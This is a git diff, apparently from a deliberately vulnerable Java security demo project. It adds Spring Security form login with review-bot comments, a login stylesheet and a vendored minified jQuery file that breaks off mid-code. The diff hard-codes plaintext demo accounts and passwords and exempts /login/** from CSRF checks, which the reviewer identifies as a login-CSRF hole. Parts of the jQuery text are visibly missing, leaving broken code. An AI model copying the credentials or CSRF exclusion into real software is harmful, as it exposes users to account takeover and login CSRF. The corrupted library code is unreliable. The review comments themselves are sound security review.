@@ -47,15 +49,34 @@ public boolean matches(HttpServletRequest request) { @Override protected void configure(HttpSecurity http) throws Exception { - // http.csrf().disable() // 去掉csrf校验 // 默认token存在session里,用CookieCsrfTokenRepository改为token存在cookie里。 // 但存在后端多台服务器情况,session不能同步的问题,所以一般使用cookie模式。 http.csrf() .requireCsrfProtectionMatcher(csrfRequestMatcher) .ignoringAntMatchers(csrfExcludeUrl) // 不进行csrf校验的uri,多个uri使用逗号分隔 .csrfTokenRepository(new CookieCsrfTokenRepository()); - // 自定义csrf校验失败的代码,默认是返回403错误页面 http.exceptionHandling().accessDeniedHandler(new CsrfAccessDeniedHandler()); // http.csrf().csrfTokenRepository(CookieCsrfTokenRepository.withHttpOnlyFalse()); + + // spring security login settings + http.authorizeRequests() + .antMatchers("/css/**", "/js/**").permitAll() // permit static resources + .anyRequest().authenticated().and() // any request authenticated except above static resources + .formLogin().loginPage("/login").permitAll() // permit all to access /login page + .successHandler(new LoginSuccessHandler()) + .failureHandler(new LoginFailureHandler()).and() + .logout().logoutUrl("/logout").permitAll().and() + .rememberMe(); // tomcat默认JSESSION会话有效时间为30分钟,所以30分钟不操作会话将过期。为了解决这一问题,引入rememberMe功能。 + } + + @Autowired + public void configureGlobal(AuthenticationManagerBuilder auth) throws Exception { + auth + .inMemoryAuthentication() + .withUser("joychou").password("joychou123").roles("USER").and() + .withUser("admin").password("admin123").roles("USER", "ADMIN"); } -} \ No newline at end of file + +} + + diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties index 9cf68432..8ba9a9b3 100644 --- a/src/main/resources/application.properties +++ b/src/main/resources/application.properties 
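Review bot: configureGlobal stores `.password("joychou123")` and `.password("admin123")` as raw strings with no PasswordEncoder on the builder; from Spring Security 5 onward in-memory authentication rejects un-prefixed passwords at login time, so this needs either `.passwordEncoder(...)` on `inMemoryAuthentication()` or `{noop}`-prefixed values, and which applies depends on the spring-security version in the pom, which is not in this diff. Hard-coded demo accounts are acceptable for this project, but a comment such as `// Demo accounts only, documented in the README; not a pattern for real deployments.` keeps the intent clear. `.rememberMe()` is left at every default: no `.key(...)`, so in current versions a random key is generated per start-up and remember-me cookies stop working on restart, and no `.tokenValiditySeconds(...)`, so the two-week lifetime the README describes is only the library default; setting both explicitly documents the intended behaviour. The trailing Chinese comment on the `.rememberMe()` line should be English like the other comments added in this hunk.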
@@ -24,7 +24,7 @@ joychou.security.referer.uri = /jsonp/** # csrf token check joychou.security.csrf.enabled = true # URI without CSRF check (only support ANT url format) -joychou.security.csrf.exclude.url = /xxe/**, /fastjson/** +joychou.security.csrf.exclude.url = /xxe/**, /fastjson/**, /login/** # method for CSRF check joychou.security.csrf.method = POST ### csrf configuration ends ### diff --git a/src/main/resources/static/css/login.css b/src/main/resources/static/css/login.css new file mode 100644 index 00000000..26401f4e --- /dev/null +++ b/src/main/resources/static/css/login.css 
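Review bot: Adding `/login/**` to `joychou.security.csrf.exclude.url` switches CSRF checking off for the login POST (the value feeds `ignoringAntMatchers` in WebSecurityConfig), which enables login CSRF: a third-party page can submit the login form and silently sign the victim into an account the attacker controls. `formLogin()` keeps CSRF protection on by design and the token is available to the login page, so the exclusion is presumably a workaround for an AJAX login request that does not send it; the fix is to include the `_csrf` token in that request and remove `/login/**` here. If the exclusion has to stay, a comment on this line stating why is needed.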
@@ -0,0 +1,106 @@ +.login-page { + width: 360px; + padding: 8% 0 0; + margin: auto; +} +.form { + position: relative; + z-index: 1; + background: #ffffff; + max-width: 360px; + margin: 0 auto 100px; + padding: 45px; + text-align: center; + box-shadow: 0 0 20px 0 rgba(0, 0, 0, 0.2), 0 5px 5px 0 rgba(0, 0, 0, 0.24); +} +.form input { + outline: 0; + background: #f2f2f2; + width: 100%; + border: 0; + margin: 0 0 15px; + padding: 15px; + box-sizing: border-box; + font-size: 14px; +} +.form button { + text-transform: uppercase; + outline: 0; + background: #4caf50; + width: 100%; + border: 0; + padding: 15px; + color: #ffffff; + font-size: 14px; + -webkit-transition: all 0.3 ease; + transition: all 0.3 ease; + cursor: pointer; +} +.form button:hover, +.form button:active, +.form button:focus { + background: #43a047; +} +.form .message { + margin: 15px 0 0; + color: #b3b3b3; + font-size: 12px; +} +.form .message a { + color: #4caf50; + text-decoration: none; +} +.form .register-form { + display: none; +} +.form p { + text-align: left; + margin: 0; + font-size: 13px; +} +.form p input { + width: auto; + margin-right: 10px; +} +.container { + position: relative; + z-index: 1; + max-width: 300px; + margin: 0 auto; +} +.container:before, +.container:after { + content: ""; + display: block; + clear: both; +} +.container .info { + margin: 50px auto; + text-align: center; +} +.container .info h1 { + margin: 0 0 15px; + padding: 0; + font-size: 36px; + font-weight: 300; + color: #1a1a1a; +} +.container .info span { + color: #4d4d4d; + font-size: 12px; +} +.container .info span a { + color: #000000; + text-decoration: none; +} +.container .info span .fa { + color: #ef3b3a; +} +body { + background: #76b852; /* fallback for old browsers */ + background: -webkit-linear-gradient(right, #76b852, #8dc26f); + background: -moz-linear-gradient(right, #76b852, #8dc26f); + background: -o-linear-gradient(right, #76b852, #8dc26f); + background: linear-gradient(to left, #76b852, #8dc26f); + 
font-family: Lato,"PingFang SC","Microsoft YaHei",sans-serif; +} diff --git a/src/main/resources/static/js/jquery-1.11.1.min.js b/src/main/resources/static/js/jquery-1.11.1.min.js new file mode 100644 index 00000000..88a5832a --- /dev/null +++ b/src/main/resources/static/js/jquery-1.11.1.min.js 
@@ -0,0 +1,4 @@ +/*! jQuery v1.11.1 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */ +!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l="1.11.1",m=function(a,b){return new m.fn.init(a,b)},n=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,o=/^-ms-/,p=/-([\da-z])/gi,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,constructor:m,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=m.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return m.each(this,a,b)},map:function(a){return this.pushStack(m.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushStack(d.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(a){var b=this.length,c=+a+(0>a?b:0);return this.pushStack(c>=0&&b>c?[this[c]]:[])},end:function(){return this.prevObject||this.constructor(null)},push:f,sort:c.sort,splice:c.splice},m.extend=m.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]||{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments[h]||{},h++),"object"==typeof g||m.isFunction(g)||(g={}),h===i&&(g=this,h--);i>h;h++)if(null!=(e=arguments[h]))for(d in e)a=g[d],c=e[d],g!==c&&(j&&c&&(m.isPlainObject(c)||(b=m.isArray(c)))?(b?(b=!1,f=a&&m.isArray(a)?a:[]):f=a&&m.isPlainObject(a)?a:{},g[d]=m.extend(j,f,c)):void 0!==c&&(g[d]=c));return g},m.extend({expando:"jQuery"+(l+Math.random()).replace(/\D/g,""),isReady:!0,error:function(a){throw new 
Error(a)},noop:function(){},isFunction:function(a){return"function"===m.type(a)},isArray:Array.isArray||function(a){return"array"===m.type(a)},isWindow:function(a){return null!=a&&a==a.window},isNumeric:function(a){return!m.isArray(a)&&a-parseFloat(a)>=0},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},isPlainObject:function(a){var b;if(!a||"object"!==m.type(a)||a.nodeType||m.isWindow(a))return!1;try{if(a.constructor&&!j.call(a,"constructor")&&!j.call(a.constructor.prototype,"isPrototypeOf"))return!1}catch(c){return!1}if(k.ownLast)for(b in a)return j.call(a,b);for(b in a);return void 0===b||j.call(a,b)},type:function(a){return null==a?a+"":"object"==typeof a||"function"==typeof a?h[i.call(a)]||"object":typeof a},globalEval:function(b){b&&m.trim(b)&&(a.execScript||function(b){a.eval.call(a,b)})(b)},camelCase:function(a){return a.replace(o,"ms-").replace(p,q)},nodeName:function(a,b){return a.nodeName&&a.nodeName.toLowerCase()===b.toLowerCase()},each:function(a,b,c){var d,e=0,f=a.length,g=r(a);if(c){if(g){for(;f>e;e++)if(d=b.apply(a[e],c),d===!1)break}else for(e in a)if(d=b.apply(a[e],c),d===!1)break}else if(g){for(;f>e;e++)if(d=b.call(a[e],e,a[e]),d===!1)break}else for(e in a)if(d=b.call(a[e],e,a[e]),d===!1)break;return a},trim:function(a){return null==a?"":(a+"").replace(n,"")},makeArray:function(a,b){var c=b||[];return null!=a&&(r(Object(a))?m.merge(c,"string"==typeof a?[a]:a):f.call(c,a)),c},inArray:function(a,b,c){var d;if(b){if(g)return g.call(b,a,c);for(d=b.length,c=c?0>c?Math.max(0,d+c):c:0;d>c;c++)if(c in b&&b[c]===a)return c}return-1},merge:function(a,b){var c=+b.length,d=0,e=a.length;while(c>d)a[e++]=b[d++];if(c!==c)while(void 0!==b[d])a[e++]=b[d++];return a.length=e,a},grep:function(a,b,c){for(var d,e=[],f=0,g=a.length,h=!c;g>f;f++)d=!b(a[f],f),d!==h&&e.push(a[f]);return e},map:function(a,b,c){var d,f=0,g=a.length,h=r(a),i=[];if(h)for(;g>f;f++)d=b(a[f],f,c),null!=d&&i.push(d);else for(f in a)d=b(a[f],f,c),null!=d&&i.push(d);return 
e.apply([],i)},guid:1,proxy:function(a,b){var c,e,f;return"string"==typeof b&&(f=a[b],b=a,a=f),m.isFunction(a)?(c=d.call(arguments,2),e=function(){return a.apply(b||this,c.concat(d.call(arguments)))},e.guid=a.guid=a.guid||m.guid++,e):void 0},now:function(){return+new Date},support:k}),m.each("Boolean Number String Function Array Date RegExp Object Error".split(" "),function(a,b){h["[object "+b+"]"]=b.toLowerCase()});function r(a){var b=a.length,c=m.type(a);return"function"===c||m.isWindow(a)?!1:1===a.nodeType&&b?!0:"array"===c||0===b||"number"==typeof b&&b>0&&b-1 in a}var s=function(a){var b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u="sizzle"+-new Date,v=a.document,w=0,x=0,y=gb(),z=gb(),A=gb(),B=function(a,b){return a===b&&(l=!0),0},C="undefined",D=1<<31,E={}.hasOwnProperty,F=[],G=F.pop,H=F.push,I=F.push,J=F.slice,K=F.indexOf||function(a){for(var b=0,c=this.length;c>b;b++)if(this[b]===a)return b;return-1},L="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t\\r\\n\\f]",N="(?:\\\\.|[\\w-]|[^\\x00-\\xa0])+",O=N.replace("w","w#"),P="\\["+M+"*("+N+")(?:"+M+"*([*^$|!~]?=)"+M+"*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|("+O+"))|)"+M+"*\\]",Q=":("+N+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+P+")*)|.*)\\)|)",R=new RegExp("^"+M+"+|((?:^|[^\\\\])(?:\\\\.)*)"+M+"+$","g"),S=new RegExp("^"+M+"*,"+M+"*"),T=new RegExp("^"+M+"*([>+~]|"+M+")"+M+"*"),U=new RegExp("="+M+"*([^\\]'\"]*?)"+M+"*\\]","g"),V=new RegExp(Q),W=new RegExp("^"+O+"$"),X={ID:new RegExp("^#("+N+")"),CLASS:new RegExp("^\\.("+N+")"),TAG:new RegExp("^("+N.replace("w","w*")+")"),ATTR:new RegExp("^"+P),PSEUDO:new RegExp("^"+Q),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+M+"*(even|odd|(([+-]|)(\\d*)n|)"+M+"*(?:([+-]|)"+M+"*(\\d+)|))"+M+"*\\)|)","i"),bool:new RegExp("^(?:"+L+")$","i"),needsContext:new 
RegExp("^"+M+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+M+"*((?:-\\d)?\\d*)"+M+"*\\)|)(?=[^-]|$)","i")},Y=/^(?:input|select|textarea|button)$/i,Z=/^h\d$/i,$=/^[^{]+\{\s*\[native \w/,_=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,ab=/[+~]/,bb=/'|\\/g,cb=new RegExp("\\\\([\\da-f]{1,6}"+M+"?|("+M+")|.)","ig"),db=function(a,b,c){var d="0x"+b-65536;return d!==d||c?b:0>d?String.fromCharCode(d+65536):String.fromCharCode(d>>10|55296,1023&d|56320)};try{I.apply(F=J.call(v.childNodes),v.childNodes),F[v.childNodes.length].nodeType}catch(eb){I={apply:F.length?function(a,b){H.apply(a,J.call(b))}:function(a,b){var c=a.length,d=0;while(a[c++]=b[d++]);a.length=c-1}}}function fb(a,b,d,e){var f,h,j,k,l,o,r,s,w,x;if((b?b.ownerDocument||b:v)!==n&&m(b),b=b||n,d=d||[],!a||"string"!=typeof a)return d;if(1!==(k=b.nodeType)&&9!==k)return[];if(p&&!e){if(f=_.exec(a))if(j=f[1]){if(9===k){if(h=b.getElementById(j),!h||!h.parentNode)return d;if(h.id===j)return d.push(h),d}else if(b.ownerDocument&&(h=b.ownerDocument.getElementById(j))&&t(b,h)&&h.id===j)return d.push(h),d}else{if(f[2])return I.apply(d,b.getElementsByTagName(a)),d;if((j=f[3])&&c.getElementsByClassName&&b.getElementsByClassName)return I.apply(d,b.getElementsByClassName(j)),d}if(c.qsa&&(!q||!q.test(a))){if(s=r=u,w=b,x=9===k&&a,1===k&&"object"!==b.nodeName.toLowerCase()){o=g(a),(r=b.getAttribute("id"))?s=r.replace(bb,"\\$&"):b.setAttribute("id",s),s="[id='"+s+"'] ",l=o.length;while(l--)o[l]=s+qb(o[l]);w=ab.test(a)&&ob(b.parentNode)||b,x=o.join(",")}if(x)try{return I.apply(d,w.querySelectorAll(x)),d}catch(y){}finally{r||b.removeAttribute("id")}}}return i(a.replace(R,"$1"),b,d,e)}function gb(){var a=[];function b(c,e){return a.push(c+" ")>d.cacheLength&&delete b[a.shift()],b[c+" "]=e}return b}function hb(a){return a[u]=!0,a}function ib(a){var b=n.createElement("div");try{return!!a(b)}catch(c){return!1}finally{b.parentNode&&b.parentNode.removeChild(b),b=null}}function jb(a,b){var 
c=a.split("|"),e=a.length;while(e--)d.attrHandle[c[e]]=b}function kb(a,b){var c=b&&a,d=c&&1===a.nodeType&&1===b.nodeType&&(~b.sourceIndex||D)-(~a.sourceIndex||D);if(d)return d;if(c)while(c=c.nextSibling)if(c===b)return-1;return a?1:-1}function lb(a){return function(b){var c=b.nodeName.toLowerCase();return"input"===c&&b.type===a}}function mb(a){return function(b){var c=b.nodeName.toLowerCase();return("input"===c||"button"===c)&&b.type===a}}function nb(a){return hb(function(b){return b=+b,hb(function(c,d){var e,f=a([],c.length,b),g=f.length;while(g--)c[e=f[g]]&&(c[e]=!(d[e]=c[e]))})})}function ob(a){return a&&typeof a.getElementsByTagName!==C&&a}c=fb.support={},f=fb.isXML=function(a){var b=a&&(a.ownerDocument||a).documentElement;return b?"HTML"!==b.nodeName:!1},m=fb.setDocument=function(a){var b,e=a?a.ownerDocument||a:v,g=e.defaultView;return e!==n&&9===e.nodeType&&e.documentElement?(n=e,o=e.documentElement,p=!f(e),g&&g!==g.top&&(g.addEventListener?g.addEventListener("unload",function(){m()},!1):g.attachEvent&&g.attachEvent("onunload",function(){m()})),c.attributes=ib(function(a){return a.className="i",!a.getAttribute("className")}),c.getElementsByTagName=ib(function(a){return a.appendChild(e.createComment("")),!a.getElementsByTagName("*").length}),c.getElementsByClassName=$.test(e.getElementsByClassName)&&ib(function(a){return a.innerHTML="
",a.firstChild.className="i",2===a.getElementsByClassName("i").length}),c.getById=ib(function(a){return o.appendChild(a).id=u,!e.getElementsByName||!e.getElementsByName(u).length}),c.getById?(d.find.ID=function(a,b){if(typeof b.getElementById!==C&&p){var c=b.getElementById(a);return c&&c.parentNode?[c]:[]}},d.filter.ID=function(a){var b=a.replace(cb,db);return function(a){return a.getAttribute("id")===b}}):(delete d.find.ID,d.filter.ID=function(a){var b=a.replace(cb,db);return function(a){var c=typeof a.getAttributeNode!==C&&a.getAttributeNode("id");return c&&c.value===b}}),d.find.TAG=c.getElementsByTagName?function(a,b){return typeof b.getElementsByTagName!==C?b.getElementsByTagName(a):void 0}:function(a,b){var c,d=[],e=0,f=b.getElementsByTagName(a);if("*"===a){while(c=f[e++])1===c.nodeType&&d.push(c);return d}return f},d.find.CLASS=c.getElementsByClassName&&function(a,b){return typeof b.getElementsByClassName!==C&&p?b.getElementsByClassName(a):void 0},r=[],q=[],(c.qsa=$.test(e.querySelectorAll))&&(ib(function(a){a.innerHTML="",a.querySelectorAll("[msallowclip^='']").length&&q.push("[*^$]="+M+"*(?:''|\"\")"),a.querySelectorAll("[selected]").length||q.push("\\["+M+"*(?:value|"+L+")"),a.querySelectorAll(":checked").length||q.push(":checked")}),ib(function(a){var b=e.createElement("input");b.setAttribute("type","hidden"),a.appendChild(b).setAttribute("name","D"),a.querySelectorAll("[name=d]").length&&q.push("name"+M+"*[*^$|!~]?="),a.querySelectorAll(":enabled").length||q.push(":enabled",":disabled"),a.querySelectorAll("*,:x"),q.push(",.*:")})),(c.matchesSelector=$.test(s=o.matches||o.webkitMatchesSelector||o.mozMatchesSelector||o.oMatchesSelector||o.msMatchesSelector))&&ib(function(a){c.disconnectedMatch=s.call(a,"div"),s.call(a,"[s!='']:x"),r.push("!=",Q)}),q=q.length&&new RegExp(q.join("|")),r=r.length&&new RegExp(r.join("|")),b=$.test(o.compareDocumentPosition),t=b||$.test(o.contains)?function(a,b){var c=9===a.nodeType?a.documentElement:a,d=b&&b.parentNode;return 
a===d||!(!d||1!==d.nodeType||!(c.contains?c.contains(d):a.compareDocumentPosition&&16&a.compareDocumentPosition(d)))}:function(a,b){if(b)while(b=b.parentNode)if(b===a)return!0;return!1},B=b?function(a,b){if(a===b)return l=!0,0;var d=!a.compareDocumentPosition-!b.compareDocumentPosition;return d?d:(d=(a.ownerDocument||a)===(b.ownerDocument||b)?a.compareDocumentPosition(b):1,1&d||!c.sortDetached&&b.compareDocumentPosition(a)===d?a===e||a.ownerDocument===v&&t(v,a)?-1:b===e||b.ownerDocument===v&&t(v,b)?1:k?K.call(k,a)-K.call(k,b):0:4&d?-1:1)}:function(a,b){if(a===b)return l=!0,0;var c,d=0,f=a.parentNode,g=b.parentNode,h=[a],i=[b];if(!f||!g)return a===e?-1:b===e?1:f?-1:g?1:k?K.call(k,a)-K.call(k,b):0;if(f===g)return kb(a,b);c=a;while(c=c.parentNode)h.unshift(c);c=b;while(c=c.parentNode)i.unshift(c);while(h[d]===i[d])d++;return d?kb(h[d],i[d]):h[d]===v?-1:i[d]===v?1:0},e):n},fb.matches=function(a,b){return fb(a,null,null,b)},fb.matchesSelector=function(a,b){if((a.ownerDocument||a)!==n&&m(a),b=b.replace(U,"='$1']"),!(!c.matchesSelector||!p||r&&r.test(b)||q&&q.test(b)))try{var d=s.call(a,b);if(d||c.disconnectedMatch||a.document&&11!==a.document.nodeType)return d}catch(e){}return fb(b,n,null,[a]).length>0},fb.contains=function(a,b){return(a.ownerDocument||a)!==n&&m(a),t(a,b)},fb.attr=function(a,b){(a.ownerDocument||a)!==n&&m(a);var e=d.attrHandle[b.toLowerCase()],f=e&&E.call(d.attrHandle,b.toLowerCase())?e(a,b,!p):void 0;return void 0!==f?f:c.attributes||!p?a.getAttribute(b):(f=a.getAttributeNode(b))&&f.specified?f.value:null},fb.error=function(a){throw new Error("Syntax error, unrecognized expression: "+a)},fb.uniqueSort=function(a){var b,d=[],e=0,f=0;if(l=!c.detectDuplicates,k=!c.sortStable&&a.slice(0),a.sort(B),l){while(b=a[f++])b===a[f]&&(e=d.push(f));while(e--)a.splice(d[e],1)}return k=null,a},e=fb.getText=function(a){var b,c="",d=0,f=a.nodeType;if(f){if(1===f||9===f||11===f){if("string"==typeof a.textContent)return 
a.textContent;for(a=a.firstChild;a;a=a.nextSibling)c+=e(a)}else if(3===f||4===f)return a.nodeValue}else while(b=a[d++])c+=e(b);return c},d=fb.selectors={cacheLength:50,createPseudo:hb,match:X,attrHandle:{},find:{},relative:{">":{dir:"parentNode",first:!0}," ":{dir:"parentNode"},"+":{dir:"previousSibling",first:!0},"~":{dir:"previousSibling"}},preFilter:{ATTR:function(a){return a[1]=a[1].replace(cb,db),a[3]=(a[3]||a[4]||a[5]||"").replace(cb,db),"~="===a[2]&&(a[3]=" "+a[3]+" "),a.slice(0,4)},CHILD:function(a){return a[1]=a[1].toLowerCase(),"nth"===a[1].slice(0,3)?(a[3]||fb.error(a[0]),a[4]=+(a[4]?a[5]+(a[6]||1):2*("even"===a[3]||"odd"===a[3])),a[5]=+(a[7]+a[8]||"odd"===a[3])):a[3]&&fb.error(a[0]),a},PSEUDO:function(a){var b,c=!a[6]&&a[2];return X.CHILD.test(a[0])?null:(a[3]?a[2]=a[4]||a[5]||"":c&&V.test(c)&&(b=g(c,!0))&&(b=c.indexOf(")",c.length-b)-c.length)&&(a[0]=a[0].slice(0,b),a[2]=c.slice(0,b)),a.slice(0,3))}},filter:{TAG:function(a){var b=a.replace(cb,db).toLowerCase();return"*"===a?function(){return!0}:function(a){return a.nodeName&&a.nodeName.toLowerCase()===b}},CLASS:function(a){var b=y[a+" "];return b||(b=new RegExp("(^|"+M+")"+a+"("+M+"|$)"))&&y(a,function(a){return b.test("string"==typeof a.className&&a.className||typeof a.getAttribute!==C&&a.getAttribute("class")||"")})},ATTR:function(a,b,c){return function(d){var e=fb.attr(d,a);return null==e?"!="===b:b?(e+="","="===b?e===c:"!="===b?e!==c:"^="===b?c&&0===e.indexOf(c):"*="===b?c&&e.indexOf(c)>-1:"$="===b?c&&e.slice(-c.length)===c:"~="===b?(" "+e+" ").indexOf(c)>-1:"|="===b?e===c||e.slice(0,c.length+1)===c+"-":!1):!0}},CHILD:function(a,b,c,d,e){var f="nth"!==a.slice(0,3),g="last"!==a.slice(-4),h="of-type"===b;return 1===d&&0===e?function(a){return!!a.parentNode}:function(b,c,i){var 
j,k,l,m,n,o,p=f!==g?"nextSibling":"previousSibling",q=b.parentNode,r=h&&b.nodeName.toLowerCase(),s=!i&&!h;if(q){if(f){while(p){l=b;while(l=l[p])if(h?l.nodeName.toLowerCase()===r:1===l.nodeType)return!1;o=p="only"===a&&!o&&"nextSibling"}return!0}if(o=[g?q.firstChild:q.lastChild],g&&s){k=q[u]||(q[u]={}),j=k[a]||[],n=j[0]===w&&j[1],m=j[0]===w&&j[2],l=n&&q.childNodes[n];while(l=++n&&l&&l[p]||(m=n=0)||o.pop())if(1===l.nodeType&&++m&&l===b){k[a]=[w,n,m];break}}else if(s&&(j=(b[u]||(b[u]={}))[a])&&j[0]===w)m=j[1];else while(l=++n&&l&&l[p]||(m=n=0)||o.pop())if((h?l.nodeName.toLowerCase()===r:1===l.nodeType)&&++m&&(s&&((l[u]||(l[u]={}))[a]=[w,m]),l===b))break;return m-=e,m===d||m%d===0&&m/d>=0}}},PSEUDO:function(a,b){var c,e=d.pseudos[a]||d.setFilters[a.toLowerCase()]||fb.error("unsupported pseudo: "+a);return e[u]?e(b):e.length>1?(c=[a,a,"",b],d.setFilters.hasOwnProperty(a.toLowerCase())?hb(function(a,c){var d,f=e(a,b),g=f.length;while(g--)d=K.call(a,f[g]),a[d]=!(c[d]=f[g])}):function(a){return e(a,0,c)}):e}},pseudos:{not:hb(function(a){var b=[],c=[],d=h(a.replace(R,"$1"));return d[u]?hb(function(a,b,c,e){var f,g=d(a,null,e,[]),h=a.length;while(h--)(f=g[h])&&(a[h]=!(b[h]=f))}):function(a,e,f){return b[0]=a,d(b,null,f,c),!c.pop()}}),has:hb(function(a){return function(b){return fb(a,b).length>0}}),contains:hb(function(a){return function(b){return(b.textContent||b.innerText||e(b)).indexOf(a)>-1}}),lang:hb(function(a){return W.test(a||"")||fb.error("unsupported lang: "+a),a=a.replace(cb,db).toLowerCase(),function(b){var c;do if(c=p?b.lang:b.getAttribute("xml:lang")||b.getAttribute("lang"))return c=c.toLowerCase(),c===a||0===c.indexOf(a+"-");while((b=b.parentNode)&&1===b.nodeType);return!1}}),target:function(b){var c=a.location&&a.location.hash;return c&&c.slice(1)===b.id},root:function(a){return a===o},focus:function(a){return a===n.activeElement&&(!n.hasFocus||n.hasFocus())&&!!(a.type||a.href||~a.tabIndex)},enabled:function(a){return 
a.disabled===!1},disabled:function(a){return a.disabled===!0},checked:function(a){var b=a.nodeName.toLowerCase();return"input"===b&&!!a.checked||"option"===b&&!!a.selected},selected:function(a){return a.parentNode&&a.parentNode.selectedIndex,a.selected===!0},empty:function(a){for(a=a.firstChild;a;a=a.nextSibling)if(a.nodeType<6)return!1;return!0},parent:function(a){return!d.pseudos.empty(a)},header:function(a){return Z.test(a.nodeName)},input:function(a){return Y.test(a.nodeName)},button:function(a){var b=a.nodeName.toLowerCase();return"input"===b&&"button"===a.type||"button"===b},text:function(a){var b;return"input"===a.nodeName.toLowerCase()&&"text"===a.type&&(null==(b=a.getAttribute("type"))||"text"===b.toLowerCase())},first:nb(function(){return[0]}),last:nb(function(a,b){return[b-1]}),eq:nb(function(a,b,c){return[0>c?c+b:c]}),even:nb(function(a,b){for(var c=0;b>c;c+=2)a.push(c);return a}),odd:nb(function(a,b){for(var c=1;b>c;c+=2)a.push(c);return a}),lt:nb(function(a,b,c){for(var d=0>c?c+b:c;--d>=0;)a.push(d);return a}),gt:nb(function(a,b,c){for(var d=0>c?c+b:c;++db;b++)d+=a[b].value;return d}function rb(a,b,c){var d=b.dir,e=c&&"parentNode"===d,f=x++;return b.first?function(b,c,f){while(b=b[d])if(1===b.nodeType||e)return a(b,c,f)}:function(b,c,g){var h,i,j=[w,f];if(g){while(b=b[d])if((1===b.nodeType||e)&&a(b,c,g))return!0}else while(b=b[d])if(1===b.nodeType||e){if(i=b[u]||(b[u]={}),(h=i[d])&&h[0]===w&&h[1]===f)return j[2]=h[2];if(i[d]=j,j[2]=a(b,c,g))return!0}}}function sb(a){return a.length>1?function(b,c,d){var e=a.length;while(e--)if(!a[e](b,c,d))return!1;return!0}:a[0]}function tb(a,b,c){for(var d=0,e=b.length;e>d;d++)fb(a,b[d],c);return c}function ub(a,b,c,d,e){for(var f,g=[],h=0,i=a.length,j=null!=b;i>h;h++)(f=a[h])&&(!c||c(f,d,e))&&(g.push(f),j&&b.push(h));return g}function vb(a,b,c,d,e,f){return d&&!d[u]&&(d=vb(d)),e&&!e[u]&&(e=vb(e,f)),hb(function(f,g,h,i){var 
j,k,l,m=[],n=[],o=g.length,p=f||tb(b||"*",h.nodeType?[h]:h,[]),q=!a||!f&&b?p:ub(p,m,a,h,i),r=c?e||(f?a:o||d)?[]:g:q;if(c&&c(q,r,h,i),d){j=ub(r,n),d(j,[],h,i),k=j.length;while(k--)(l=j[k])&&(r[n[k]]=!(q[n[k]]=l))}if(f){if(e||a){if(e){j=[],k=r.length;while(k--)(l=r[k])&&j.push(q[k]=l);e(null,r=[],j,i)}k=r.length;while(k--)(l=r[k])&&(j=e?K.call(f,l):m[k])>-1&&(f[j]=!(g[j]=l))}}else r=ub(r===g?r.splice(o,r.length):r),e?e(null,g,r,i):I.apply(g,r)})}function wb(a){for(var b,c,e,f=a.length,g=d.relative[a[0].type],h=g||d.relative[" "],i=g?1:0,k=rb(function(a){return a===b},h,!0),l=rb(function(a){return K.call(b,a)>-1},h,!0),m=[function(a,c,d){return!g&&(d||c!==j)||((b=c).nodeType?k(a,c,d):l(a,c,d))}];f>i;i++)if(c=d.relative[a[i].type])m=[rb(sb(m),c)];else{if(c=d.filter[a[i].type].apply(null,a[i].matches),c[u]){for(e=++i;f>e;e++)if(d.relative[a[e].type])break;return vb(i>1&&sb(m),i>1&&qb(a.slice(0,i-1).concat({value:" "===a[i-2].type?"*":""})).replace(R,"$1"),c,e>i&&wb(a.slice(i,e)),f>e&&wb(a=a.slice(e)),f>e&&qb(a))}m.push(c)}return sb(m)}function xb(a,b){var c=b.length>0,e=a.length>0,f=function(f,g,h,i,k){var l,m,o,p=0,q="0",r=f&&[],s=[],t=j,u=f||e&&d.find.TAG("*",k),v=w+=null==t?1:Math.random()||.1,x=u.length;for(k&&(j=g!==n&&g);q!==x&&null!=(l=u[q]);q++){if(e&&l){m=0;while(o=a[m++])if(o(l,g,h)){i.push(l);break}k&&(w=v)}c&&((l=!o&&l)&&p--,f&&r.push(l))}if(p+=q,c&&q!==p){m=0;while(o=b[m++])o(r,s,g,h);if(f){if(p>0)while(q--)r[q]||s[q]||(s[q]=G.call(i));s=ub(s)}I.apply(i,s),k&&!f&&s.length>0&&p+b.length>1&&fb.uniqueSort(i)}return k&&(w=v,j=t),r};return c?hb(f):f}return h=fb.compile=function(a,b){var c,d=[],e=[],f=A[a+" "];if(!f){b||(b=g(a)),c=b.length;while(c--)f=wb(b[c]),f[u]?d.push(f):e.push(f);f=A(a,xb(e,d)),f.selector=a}return f},i=fb.select=function(a,b,e,f){var i,j,k,l,m,n="function"==typeof 
